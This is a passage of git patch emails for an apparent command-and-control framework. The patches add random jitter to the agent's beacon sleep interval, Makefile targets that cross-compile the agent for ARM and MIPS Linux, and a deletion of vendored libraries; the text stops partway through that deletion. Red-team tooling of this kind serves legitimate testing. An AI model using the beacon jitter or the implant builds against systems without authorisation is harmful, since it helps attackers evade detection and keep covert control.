From 9c1252339dc7cbbc87845fcc408b35680ecb9697 Mon Sep 17 00:00:00 2001 From: ahhh Date: Thu, 21 Dec 2017 11:16:18 -0800 Subject: [PATCH 01/60] adding a time skew to the beacon intervals --- cmd/merlinagent/main.go | 12 +++++++++--- cmd/merlinserver/main.go | 1 - 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 0229871a..5a723070 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -32,11 +32,11 @@ import ( "time" "github.com/fatih/color" - "github.com/satori/go.uuid" "golang.org/x/net/http2" "github.com/ne0nd0g/merlin/pkg/agent" "github.com/ne0nd0g/merlin/pkg/messages" + "github.com/satori/go.uuid" ) // GLOBAL VARIABLES @@ -47,6 +47,7 @@ var mRun = true var hostUUID = uuid.NewV4() var url = "https://127.0.0.1:443/" var h2Client = getH2WebClient() +var waitSkew int64 = 30000 var waitTime = 30000 * time.Millisecond var agentShell = "" var paddingMax = 4096 @@ -67,9 +68,12 @@ const ( func main() { + rand.Seed(time.Now().Unix()) + flag.BoolVar(&verbose, "v", false, "Enable verbose output") flag.BoolVar(&debug, "debug", false, "Enable debug output") flag.StringVar(&url, "url", url, "Full URL for agent to connect to") + flag.Int64Var(&waitSkew, "skew", 3000, "varriable skew added to each agent sleep") flag.DurationVar(&waitTime, "sleep", 30000*time.Millisecond, "Time for agent to sleep") flag.Usage = usage flag.Parse() @@ -94,10 +98,12 @@ func main() { if failedCheckin >= maxRetry { os.Exit(1) } + timeSkew := time.Duration(rand.Int63n(waitSkew)) * time.Millisecond + totalWaitTime := waitTime + timeSkew if verbose { - color.Yellow("[-]Sleeping for %s at %s", waitTime.String(), time.Now()) + color.Yellow("[-]Sleeping for %s at %s", totalWaitTime.String(), time.Now()) } - time.Sleep(waitTime) + time.Sleep(totalWaitTime) } } diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index dea71bad..d5e262ac 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -38,7 +38,6 @@ import ( "github.com/chzyer/readline" "github.com/fatih/color" "github.com/olekukonko/tablewriter" - "github.com/satori/go.uuid" // Merlin "github.com/ne0nd0g/merlin/pkg" From 9912e2c36c3753129b5ec71bd684ca3738245923 Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Thu, 21 Dec 2017 11:19:16 -0800 Subject: [PATCH 02/60] Update main.go --- cmd/merlinserver/main.go | 1 + 1 file changed, 1 insertion(+) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index d5e262ac..dea71bad 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -38,6 +38,7 @@ import ( "github.com/chzyer/readline" "github.com/fatih/color" "github.com/olekukonko/tablewriter" + "github.com/satori/go.uuid" // Merlin "github.com/ne0nd0g/merlin/pkg" From a691fe83f9998eb175e62d9c8f7a2726b4d83489 Mon Sep 17 00:00:00 2001 From: ahhh Date: Thu, 21 Dec 2017 14:24:02 -0800 Subject: [PATCH 03/60] minor fixes as requested by Ne0nd0g --- README.MD | 2 ++ cmd/merlinagent/main.go | 6 +++--- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/README.MD b/README.MD index 02bd16c8..34a10349 100644 --- a/README.MD +++ b/README.MD @@ -133,6 +133,8 @@ Run Merlin Agent as script: `go run cmd/merlinagent/main.go` Enable debug output -sleep duration Time for agent to sleep (default 10s) + -skew int + Variable time skew for agent to sleep -url string Full URL for agent to connect to (default "https://127.0.0.1:443") -v Enable verbose output diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 5a723070..6836bad9 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -68,16 +68,16 @@ const ( func main() { - rand.Seed(time.Now().Unix()) - flag.BoolVar(&verbose, "v", false, "Enable verbose output") flag.BoolVar(&debug, "debug", false, "Enable debug output") flag.StringVar(&url, "url", url, "Full URL for agent to connect to") - flag.Int64Var(&waitSkew, "skew", 3000, "varriable skew added to each agent sleep") + flag.Int64Var(&waitSkew, "skew", 3000, "Variable time skew for agent to sleep") flag.DurationVar(&waitTime, "sleep", 30000*time.Millisecond, "Time for agent to sleep") flag.Usage = usage flag.Parse() + rand.Seed(time.Now().UTC().UnixNano()) + if verbose { color.Yellow("[-]Agent version: %s", version) color.Yellow("[-]Agent build: %s", build) From 7173fc442d48b9abd13b508cad67827e794ee4e4 Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Thu, 21 Dec 2017 17:19:29 -0800 Subject: [PATCH 04/60] Update main.go --- cmd/merlinagent/main.go | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 6836bad9..ecf53d6b 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -33,10 +33,11 @@ import ( "github.com/fatih/color" "golang.org/x/net/http2" - + "github.com/satori/go.uuid" + "github.com/ne0nd0g/merlin/pkg/agent" "github.com/ne0nd0g/merlin/pkg/messages" - "github.com/satori/go.uuid" + ) // GLOBAL VARIABLES From c51b7c848e1a79c02f0b9956680ffec9df92c19b Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Thu, 21 Dec 2017 17:20:37 -0800 Subject: [PATCH 05/60] Update main.go --- cmd/merlinagent/main.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index ecf53d6b..7c686663 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -32,8 +32,8 @@ import ( "time" "github.com/fatih/color" - "golang.org/x/net/http2" "github.com/satori/go.uuid" + "golang.org/x/net/http2" "github.com/ne0nd0g/merlin/pkg/agent" "github.com/ne0nd0g/merlin/pkg/messages" From ff7a04d8d18e2a61afd7adbe619e57e48eace25a Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Thu, 21 Dec 2017 20:49:01 -0500 Subject: [PATCH 06/60] Removed vendor folder and added mips & arm targets --- .gitignore | 4 ++++ Makefile | 16 ++++++++++++++++ 2 files changed, 20 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 00000000..8d624778 --- /dev/null +++ b/.gitignore @@ -0,0 +1,4 @@ +.DS_STORE +data/.DS_Store +data/x509/server.crt +data/x509/server.key diff --git a/Makefile b/Makefile index ff1596e0..54b77d90 100644 --- a/Makefile +++ b/Makefile @@ -15,6 +15,8 @@ F=README.MD LICENSE data/README.MD data/agents/README.MD data/db/ data/log/READM F2=LICENSE W=Windows-x64 L=Linux-x64 +A=Linux-arm +M=Linux-mips D=Darwin-x64 # Make Directory to store executables @@ -31,6 +33,12 @@ windows: server-windows agent-windows # Compile Linux binaries linux: server-linux agent-linux +# Compile Arm binaries +arm: agent-arm + +# Compile mips binaries +mips: agent-mips + # Compile Darwin binaries darwin: server-darwin agent-darwin @@ -46,6 +54,14 @@ agent-windows: server-linux: export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MSERVER}-${L} cmd/merlinserver/main.go +# Compile Agent - Linux mips +agent-mips: + export GOOS=linux;export GOARCH=mips;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${M} cmd/merlinagent/main.go + +# Compile Agent - Linux arm +agent-arm: + export GOOS=linux;export GOARCH=arm;export GOARM=7;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${A} cmd/merlinagent/main.go + # Compile Agent - Linux x64 agent-linux: export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${L} cmd/merlinagent/main.go From 639b470cae146a816ce8cfd4cf8e86f4a55c98d3 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Thu, 21 Dec 2017 20:50:43 -0500 Subject: [PATCH 07/60] really deleted the vendor files --- .../github.com/chzyer/readline/CHANGELOG.md | 58 - vendor/github.com/chzyer/readline/LICENSE | 22 - vendor/github.com/chzyer/readline/README.md | 114 - .../chzyer/readline/ansi_windows.go | 246 -- vendor/github.com/chzyer/readline/complete.go | 283 -- .../chzyer/readline/complete_helper.go | 165 - .../chzyer/readline/complete_segment.go | 82 - vendor/github.com/chzyer/readline/history.go | 312 -- .../github.com/chzyer/readline/operation.go | 504 --- vendor/github.com/chzyer/readline/password.go | 32 - .../chzyer/readline/rawreader_windows.go | 125 - vendor/github.com/chzyer/readline/readline.go | 288 -- vendor/github.com/chzyer/readline/remote.go | 474 --- vendor/github.com/chzyer/readline/runebuf.go | 572 ---- vendor/github.com/chzyer/readline/runes.go | 223 -- vendor/github.com/chzyer/readline/search.go | 164 - vendor/github.com/chzyer/readline/std.go | 133 - .../github.com/chzyer/readline/std_windows.go | 9 - vendor/github.com/chzyer/readline/term.go | 123 - vendor/github.com/chzyer/readline/term_bsd.go | 29 - .../github.com/chzyer/readline/term_linux.go | 33 - .../chzyer/readline/term_solaris.go | 32 - .../github.com/chzyer/readline/term_unix.go | 24 - .../chzyer/readline/term_windows.go | 171 - vendor/github.com/chzyer/readline/terminal.go | 232 -- vendor/github.com/chzyer/readline/utils.go | 276 -- .../github.com/chzyer/readline/utils_unix.go | 83 - .../chzyer/readline/utils_windows.go | 41 - vendor/github.com/chzyer/readline/vim.go | 174 - .../github.com/chzyer/readline/windows_api.go | 152 - vendor/github.com/fatih/color/LICENSE.md | 20 - vendor/github.com/fatih/color/README.md | 154 - vendor/github.com/fatih/color/color.go | 423 --- vendor/github.com/fatih/color/doc.go | 114 - .../olekukonko/tablewriter/LICENCE.md | 19 - .../olekukonko/tablewriter/README.md | 204 -- .../github.com/olekukonko/tablewriter/csv.go | 52 - .../olekukonko/tablewriter/table.go | 662 ---- .../olekukonko/tablewriter/test.csv | 4 - .../olekukonko/tablewriter/test_info.csv | 4 - .../github.com/olekukonko/tablewriter/util.go | 72 - .../github.com/olekukonko/tablewriter/wrap.go | 103 - vendor/github.com/satori/go.uuid/LICENSE | 20 - vendor/github.com/satori/go.uuid/README.md | 65 - vendor/github.com/satori/go.uuid/uuid.go | 481 --- vendor/golang.org/x/net/LICENSE | 27 - vendor/golang.org/x/net/PATENTS | 22 - vendor/golang.org/x/net/http2/Dockerfile | 51 - vendor/golang.org/x/net/http2/Makefile | 3 - vendor/golang.org/x/net/http2/README | 20 - vendor/golang.org/x/net/http2/ciphers.go | 641 ---- .../x/net/http2/client_conn_pool.go | 256 -- .../x/net/http2/configure_transport.go | 80 - vendor/golang.org/x/net/http2/databuffer.go | 146 - vendor/golang.org/x/net/http2/errors.go | 133 - vendor/golang.org/x/net/http2/flow.go | 50 - vendor/golang.org/x/net/http2/frame.go | 1579 --------- vendor/golang.org/x/net/http2/go16.go | 16 - vendor/golang.org/x/net/http2/go17.go | 106 - vendor/golang.org/x/net/http2/go17_not18.go | 36 - vendor/golang.org/x/net/http2/go18.go | 56 - vendor/golang.org/x/net/http2/go19.go | 16 - vendor/golang.org/x/net/http2/gotrack.go | 170 - vendor/golang.org/x/net/http2/headermap.go | 78 - vendor/golang.org/x/net/http2/http2.go | 391 --- vendor/golang.org/x/net/http2/not_go16.go | 21 - vendor/golang.org/x/net/http2/not_go17.go | 87 - vendor/golang.org/x/net/http2/not_go18.go | 29 - vendor/golang.org/x/net/http2/not_go19.go | 16 - vendor/golang.org/x/net/http2/pipe.go | 163 - vendor/golang.org/x/net/http2/server.go | 2857 ----------------- vendor/golang.org/x/net/http2/transport.go | 2134 ------------ vendor/golang.org/x/net/http2/write.go | 370 --- vendor/golang.org/x/net/http2/writesched.go | 242 -- .../x/net/http2/writesched_priority.go | 452 --- .../x/net/http2/writesched_random.go | 72 - vendor/vendor.json | 43 - 77 files changed, 17936 deletions(-) delete mode 100644 vendor/github.com/chzyer/readline/CHANGELOG.md delete mode 100644 vendor/github.com/chzyer/readline/LICENSE delete mode 100644 vendor/github.com/chzyer/readline/README.md delete mode 100644 vendor/github.com/chzyer/readline/ansi_windows.go delete mode 100644 vendor/github.com/chzyer/readline/complete.go delete mode 100644 vendor/github.com/chzyer/readline/complete_helper.go delete mode 100644 vendor/github.com/chzyer/readline/complete_segment.go delete mode 100644 vendor/github.com/chzyer/readline/history.go delete mode 100644 vendor/github.com/chzyer/readline/operation.go delete mode 100644 vendor/github.com/chzyer/readline/password.go delete mode 100644 vendor/github.com/chzyer/readline/rawreader_windows.go delete mode 100644 vendor/github.com/chzyer/readline/readline.go delete mode 100644 vendor/github.com/chzyer/readline/remote.go delete mode 100644 vendor/github.com/chzyer/readline/runebuf.go delete mode 100644 vendor/github.com/chzyer/readline/runes.go delete mode 100644 vendor/github.com/chzyer/readline/search.go delete mode 100644 vendor/github.com/chzyer/readline/std.go delete mode 100644 vendor/github.com/chzyer/readline/std_windows.go delete mode 100644 vendor/github.com/chzyer/readline/term.go delete mode 100644 vendor/github.com/chzyer/readline/term_bsd.go delete mode 100644 vendor/github.com/chzyer/readline/term_linux.go delete mode 100644 vendor/github.com/chzyer/readline/term_solaris.go delete mode 100644 vendor/github.com/chzyer/readline/term_unix.go delete mode 100644 vendor/github.com/chzyer/readline/term_windows.go delete mode 100644 vendor/github.com/chzyer/readline/terminal.go delete mode 100644 vendor/github.com/chzyer/readline/utils.go delete mode 100644 vendor/github.com/chzyer/readline/utils_unix.go delete mode 100644 vendor/github.com/chzyer/readline/utils_windows.go delete mode 100644 vendor/github.com/chzyer/readline/vim.go delete mode 100644 vendor/github.com/chzyer/readline/windows_api.go delete mode 100644 vendor/github.com/fatih/color/LICENSE.md delete mode 100644 vendor/github.com/fatih/color/README.md delete mode 100644 vendor/github.com/fatih/color/color.go delete mode 100644 vendor/github.com/fatih/color/doc.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/LICENCE.md delete mode 100644 vendor/github.com/olekukonko/tablewriter/README.md delete mode 100644 vendor/github.com/olekukonko/tablewriter/csv.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/table.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/test.csv delete mode 100644 vendor/github.com/olekukonko/tablewriter/test_info.csv delete mode 100644 vendor/github.com/olekukonko/tablewriter/util.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/wrap.go delete mode 100644 vendor/github.com/satori/go.uuid/LICENSE delete mode 100644 vendor/github.com/satori/go.uuid/README.md delete mode 100644 vendor/github.com/satori/go.uuid/uuid.go delete mode 100644 vendor/golang.org/x/net/LICENSE delete mode 100644 vendor/golang.org/x/net/PATENTS delete mode 100644 vendor/golang.org/x/net/http2/Dockerfile delete mode 100644 vendor/golang.org/x/net/http2/Makefile delete mode 100644 vendor/golang.org/x/net/http2/README delete mode 100644 vendor/golang.org/x/net/http2/ciphers.go delete mode 100644 vendor/golang.org/x/net/http2/client_conn_pool.go delete mode 100644 vendor/golang.org/x/net/http2/configure_transport.go delete mode 100644 vendor/golang.org/x/net/http2/databuffer.go delete mode 100644 vendor/golang.org/x/net/http2/errors.go delete mode 100644 vendor/golang.org/x/net/http2/flow.go delete mode 100644 vendor/golang.org/x/net/http2/frame.go delete mode 100644 vendor/golang.org/x/net/http2/go16.go delete mode 100644 vendor/golang.org/x/net/http2/go17.go delete mode 100644 vendor/golang.org/x/net/http2/go17_not18.go delete mode 100644 vendor/golang.org/x/net/http2/go18.go delete mode 100644 vendor/golang.org/x/net/http2/go19.go delete mode 100644 vendor/golang.org/x/net/http2/gotrack.go delete mode 100644 vendor/golang.org/x/net/http2/headermap.go delete mode 100644 vendor/golang.org/x/net/http2/http2.go delete mode 100644 vendor/golang.org/x/net/http2/not_go16.go delete mode 100644 vendor/golang.org/x/net/http2/not_go17.go delete mode 100644 vendor/golang.org/x/net/http2/not_go18.go delete mode 100644 vendor/golang.org/x/net/http2/not_go19.go delete mode 100644 vendor/golang.org/x/net/http2/pipe.go delete mode 100644 vendor/golang.org/x/net/http2/server.go delete mode 100644 vendor/golang.org/x/net/http2/transport.go delete mode 100644 vendor/golang.org/x/net/http2/write.go delete mode 100644 vendor/golang.org/x/net/http2/writesched.go delete mode 100644 vendor/golang.org/x/net/http2/writesched_priority.go delete mode 100644 vendor/golang.org/x/net/http2/writesched_random.go delete mode 100644 vendor/vendor.json diff --git a/vendor/github.com/chzyer/readline/CHANGELOG.md b/vendor/github.com/chzyer/readline/CHANGELOG.md deleted file mode 100644 index 5c1811a7..00000000 --- a/vendor/github.com/chzyer/readline/CHANGELOG.md +++ /dev/null @@ -1,58 +0,0 @@ -# ChangeLog - -### 1.4 - 2016-07-25 - -* [#60][60] Support dynamic autocompletion -* Fix ANSI parser on Windows -* Fix wrong column width in complete mode on Windows -* Remove dependent package "golang.org/x/crypto/ssh/terminal" - -### 1.3 - 2016-05-09 - -* [#38][38] add SetChildren for prefix completer interface -* [#42][42] improve multiple lines compatibility -* [#43][43] remove sub-package(runes) for gopkg compatiblity -* [#46][46] Auto complete with space prefixed line -* [#48][48] support suspend process (ctrl+Z) -* [#49][49] fix bug that check equals with previous command -* [#53][53] Fix bug which causes integer divide by zero panicking when input buffer is empty - -### 1.2 - 2016-03-05 - -* Add a demo for checking password strength [example/readline-pass-strength](https://github.com/chzyer/readline/blob/master/example/readline-pass-strength/readline-pass-strength.go), , written by [@sahib](https://github.com/sahib) -* [#23][23], support stdin remapping -* [#27][27], add a `UniqueEditLine` to `Config`, which will erase the editing line after user submited it, usually use in IM. -* Add a demo for multiline [example/readline-multiline](https://github.com/chzyer/readline/blob/master/example/readline-multiline/readline-multiline.go) which can submit one SQL by multiple lines. -* Supports performs even stdin/stdout is not a tty. -* Add a new simple apis for single instance, check by [here](https://github.com/chzyer/readline/blob/master/std.go). It need to save history manually if using this api. -* [#28][28], fixes the history is not working as expected. -* [#33][33], vim mode now support `c`, `d`, `x (delete character)`, `r (replace character)` - -### 1.1 - 2015-11-20 - -* [#12][12] Add support for key ``/``/`` -* Only enter raw mode as needed (calling `Readline()`), program will receive signal(e.g. Ctrl+C) if not interact with `readline`. -* Bugs fixed for `PrefixCompleter` -* Press `Ctrl+D` in empty line will cause `io.EOF` in error, Press `Ctrl+C` in anytime will cause `ErrInterrupt` instead of `io.EOF`, this will privodes a shell-like user experience. -* Customable Interrupt/EOF prompt in `Config` -* [#17][17] Change atomic package to use 32bit function to let it runnable on arm 32bit devices -* Provides a new password user experience(`readline.ReadPasswordEx()`). - -### 1.0 - 2015-10-14 - -* Initial public release. - -[12]: https://github.com/chzyer/readline/pull/12 -[17]: https://github.com/chzyer/readline/pull/17 -[23]: https://github.com/chzyer/readline/pull/23 -[27]: https://github.com/chzyer/readline/pull/27 -[28]: https://github.com/chzyer/readline/pull/28 -[33]: https://github.com/chzyer/readline/pull/33 -[38]: https://github.com/chzyer/readline/pull/38 -[42]: https://github.com/chzyer/readline/pull/42 -[43]: https://github.com/chzyer/readline/pull/43 -[46]: https://github.com/chzyer/readline/pull/46 -[48]: https://github.com/chzyer/readline/pull/48 -[49]: https://github.com/chzyer/readline/pull/49 -[53]: https://github.com/chzyer/readline/pull/53 -[60]: https://github.com/chzyer/readline/pull/60 diff --git a/vendor/github.com/chzyer/readline/LICENSE b/vendor/github.com/chzyer/readline/LICENSE deleted file mode 100644 index c9afab3d..00000000 --- a/vendor/github.com/chzyer/readline/LICENSE +++ /dev/null @@ -1,22 +0,0 @@ -The MIT License (MIT) - -Copyright (c) 2015 Chzyer - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - diff --git a/vendor/github.com/chzyer/readline/README.md b/vendor/github.com/chzyer/readline/README.md deleted file mode 100644 index fab974b7..00000000 --- a/vendor/github.com/chzyer/readline/README.md +++ /dev/null @@ -1,114 +0,0 @@ -[![Build Status](https://travis-ci.org/chzyer/readline.svg?branch=master)](https://travis-ci.org/chzyer/readline) -[![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg)](LICENSE.md) -[![Version](https://img.shields.io/github/tag/chzyer/readline.svg)](https://github.com/chzyer/readline/releases) -[![GoDoc](https://godoc.org/github.com/chzyer/readline?status.svg)](https://godoc.org/github.com/chzyer/readline) -[![OpenCollective](https://opencollective.com/readline/badge/backers.svg)](#backers) -[![OpenCollective](https://opencollective.com/readline/badge/sponsors.svg)](#sponsors) - -

- - - -

- -A powerful readline library in `Linux` `macOS` `Windows` `Solaris` - -## Guide - -* [Demo](example/readline-demo/readline-demo.go) -* [Shortcut](doc/shortcut.md) - -## Repos using readline - -[![cockroachdb](https://img.shields.io/github/stars/cockroachdb/cockroach.svg?label=cockroachdb/cockroach)](https://github.com/cockroachdb/cockroach) -[![robertkrimen/otto](https://img.shields.io/github/stars/robertkrimen/otto.svg?label=robertkrimen/otto)](https://github.com/robertkrimen/otto) -[![empire](https://img.shields.io/github/stars/remind101/empire.svg?label=remind101/empire)](https://github.com/remind101/empire) -[![mehrdadrad/mylg](https://img.shields.io/github/stars/mehrdadrad/mylg.svg?label=mehrdadrad/mylg)](https://github.com/mehrdadrad/mylg) -[![knq/usql](https://img.shields.io/github/stars/knq/usql.svg?label=knq/usql)](https://github.com/knq/usql) -[![youtube/doorman](https://img.shields.io/github/stars/youtube/doorman.svg?label=youtube/doorman)](https://github.com/youtube/doorman) -[![bom-d-van/harp](https://img.shields.io/github/stars/bom-d-van/harp.svg?label=bom-d-van/harp)](https://github.com/bom-d-van/harp) -[![abiosoft/ishell](https://img.shields.io/github/stars/abiosoft/ishell.svg?label=abiosoft/ishell)](https://github.com/abiosoft/ishell) -[![Netflix/hal-9001](https://img.shields.io/github/stars/Netflix/hal-9001.svg?label=Netflix/hal-9001)](https://github.com/Netflix/hal-9001) -[![docker/go-p9p](https://img.shields.io/github/stars/docker/go-p9p.svg?label=docker/go-p9p)](https://github.com/docker/go-p9p) - - -## Feedback - -If you have any questions, please submit a github issue and any pull requests is welcomed :) - -* [https://twitter.com/chzyer](https://twitter.com/chzyer) -* [http://weibo.com/2145262190](http://weibo.com/2145262190) - - -## Backers - -Love Readline? Help me keep it alive by donating funds to cover project expenses!
-[[Become a backer](https://opencollective.com/readline#backer)] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -## Sponsors - -Become a sponsor and get your logo here on our Github page. [[Become a sponsor](https://opencollective.com/readline#sponsor)] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/vendor/github.com/chzyer/readline/ansi_windows.go b/vendor/github.com/chzyer/readline/ansi_windows.go deleted file mode 100644 index da106b57..00000000 --- a/vendor/github.com/chzyer/readline/ansi_windows.go +++ /dev/null @@ -1,246 +0,0 @@ -// +build windows - -package readline - -import ( - "bufio" - "io" - "strconv" - "strings" - "sync" - "unicode/utf8" - "unsafe" -) - -const ( - _ = uint16(0) - COLOR_FBLUE = 0x0001 - COLOR_FGREEN = 0x0002 - COLOR_FRED = 0x0004 - COLOR_FINTENSITY = 0x0008 - - COLOR_BBLUE = 0x0010 - COLOR_BGREEN = 0x0020 - COLOR_BRED = 0x0040 - COLOR_BINTENSITY = 0x0080 - - COMMON_LVB_UNDERSCORE = 0x8000 -) - -var ColorTableFg = []word{ - 0, // 30: Black - COLOR_FRED, // 31: Red - COLOR_FGREEN, // 32: Green - COLOR_FRED | COLOR_FGREEN, // 33: Yellow - COLOR_FBLUE, // 34: Blue - COLOR_FRED | COLOR_FBLUE, // 35: Magenta - COLOR_FGREEN | COLOR_FBLUE, // 36: Cyan - COLOR_FRED | COLOR_FBLUE | COLOR_FGREEN, // 37: White -} - -var ColorTableBg = []word{ - 0, // 40: Black - COLOR_BRED, // 41: Red - COLOR_BGREEN, // 42: Green - COLOR_BRED | COLOR_BGREEN, // 43: Yellow - COLOR_BBLUE, // 44: Blue - COLOR_BRED | COLOR_BBLUE, // 45: Magenta - COLOR_BGREEN | COLOR_BBLUE, // 46: Cyan - COLOR_BRED | COLOR_BBLUE | COLOR_BGREEN, // 47: White -} - -type ANSIWriter struct { - target io.Writer - wg sync.WaitGroup - ctx *ANSIWriterCtx - sync.Mutex -} - -func NewANSIWriter(w io.Writer) *ANSIWriter { - a := &ANSIWriter{ - target: w, - ctx: NewANSIWriterCtx(w), - } - return a -} - -func (a *ANSIWriter) Close() error { - a.wg.Wait() - return nil -} - -type ANSIWriterCtx struct { - isEsc bool - isEscSeq bool - arg []string - target *bufio.Writer - wantFlush bool -} - -func NewANSIWriterCtx(target io.Writer) *ANSIWriterCtx { - return &ANSIWriterCtx{ - target: bufio.NewWriter(target), - } -} - -func (a *ANSIWriterCtx) Flush() { - a.target.Flush() -} - -func (a *ANSIWriterCtx) process(r rune) bool { - if a.wantFlush { - if r == 0 || r == CharEsc { - a.wantFlush = false - a.target.Flush() - } - } - if a.isEscSeq { - a.isEscSeq = a.ioloopEscSeq(a.target, r, &a.arg) - return true - } - - switch r { - case CharEsc: - a.isEsc = true - case '[': - if a.isEsc { - a.arg = nil - a.isEscSeq = true - a.isEsc = false - break - } - fallthrough - default: - a.target.WriteRune(r) - a.wantFlush = true - } - return true -} - -func (a *ANSIWriterCtx) ioloopEscSeq(w *bufio.Writer, r rune, argptr *[]string) bool { - arg := *argptr - var err error - - if r >= 'A' && r <= 'D' { - count := short(GetInt(arg, 1)) - info, err := GetConsoleScreenBufferInfo() - if err != nil { - return false - } - switch r { - case 'A': // up - info.dwCursorPosition.y -= count - case 'B': // down - info.dwCursorPosition.y += count - case 'C': // right - info.dwCursorPosition.x += count - case 'D': // left - info.dwCursorPosition.x -= count - } - SetConsoleCursorPosition(&info.dwCursorPosition) - return false - } - - switch r { - case 'J': - killLines() - case 'K': - eraseLine() - case 'm': - color := word(0) - for _, item := range arg { - var c int - c, err = strconv.Atoi(item) - if err != nil { - w.WriteString("[" + strings.Join(arg, ";") + "m") - break - } - if c >= 30 && c < 40 { - color ^= COLOR_FINTENSITY - color |= ColorTableFg[c-30] - } else if c >= 40 && c < 50 { - color ^= COLOR_BINTENSITY - color |= ColorTableBg[c-40] - } else if c == 4 { - color |= COMMON_LVB_UNDERSCORE | ColorTableFg[7] - } else { // unknown code treat as reset - color = ColorTableFg[7] - } - } - if err != nil { - break - } - kernel.SetConsoleTextAttribute(stdout, uintptr(color)) - case '\007': // set title - case ';': - if len(arg) == 0 || arg[len(arg)-1] != "" { - arg = append(arg, "") - *argptr = arg - } - return true - default: - if len(arg) == 0 { - arg = append(arg, "") - } - arg[len(arg)-1] += string(r) - *argptr = arg - return true - } - *argptr = nil - return false -} - -func (a *ANSIWriter) Write(b []byte) (int, error) { - a.Lock() - defer a.Unlock() - - off := 0 - for len(b) > off { - r, size := utf8.DecodeRune(b[off:]) - if size == 0 { - return off, io.ErrShortWrite - } - off += size - a.ctx.process(r) - } - a.ctx.Flush() - return off, nil -} - -func killLines() error { - sbi, err := GetConsoleScreenBufferInfo() - if err != nil { - return err - } - - size := (sbi.dwCursorPosition.y - sbi.dwSize.y) * sbi.dwSize.x - size += sbi.dwCursorPosition.x - - var written int - kernel.FillConsoleOutputAttribute(stdout, uintptr(ColorTableFg[7]), - uintptr(size), - sbi.dwCursorPosition.ptr(), - uintptr(unsafe.Pointer(&written)), - ) - return kernel.FillConsoleOutputCharacterW(stdout, uintptr(' '), - uintptr(size), - sbi.dwCursorPosition.ptr(), - uintptr(unsafe.Pointer(&written)), - ) -} - -func eraseLine() error { - sbi, err := GetConsoleScreenBufferInfo() - if err != nil { - return err - } - - size := sbi.dwSize.x - sbi.dwCursorPosition.x = 0 - var written int - return kernel.FillConsoleOutputCharacterW(stdout, uintptr(' '), - uintptr(size), - sbi.dwCursorPosition.ptr(), - uintptr(unsafe.Pointer(&written)), - ) -} diff --git a/vendor/github.com/chzyer/readline/complete.go b/vendor/github.com/chzyer/readline/complete.go deleted file mode 100644 index 349fc3d2..00000000 --- a/vendor/github.com/chzyer/readline/complete.go +++ /dev/null @@ -1,283 +0,0 @@ -package readline - -import ( - "bufio" - "bytes" - "fmt" - "io" -) - -type AutoCompleter interface { - // Readline will pass the whole line and current offset to it - // Completer need to pass all the candidates, and how long they shared the same characters in line - // Example: - // [go, git, git-shell, grep] - // Do("g", 1) => ["o", "it", "it-shell", "rep"], 1 - // Do("gi", 2) => ["t", "t-shell"], 2 - // Do("git", 3) => ["", "-shell"], 3 - Do(line []rune, pos int) (newLine [][]rune, length int) -} - -type TabCompleter struct{} - -func (t *TabCompleter) Do([]rune, int) ([][]rune, int) { - return [][]rune{[]rune("\t")}, 0 -} - -type opCompleter struct { - w io.Writer - op *Operation - width int - - inCompleteMode bool - inSelectMode bool - candidate [][]rune - candidateSource []rune - candidateOff int - candidateChoise int - candidateColNum int -} - -func newOpCompleter(w io.Writer, op *Operation, width int) *opCompleter { - return &opCompleter{ - w: w, - op: op, - width: width, - } -} - -func (o *opCompleter) doSelect() { - if len(o.candidate) == 1 { - o.op.buf.WriteRunes(o.candidate[0]) - o.ExitCompleteMode(false) - return - } - 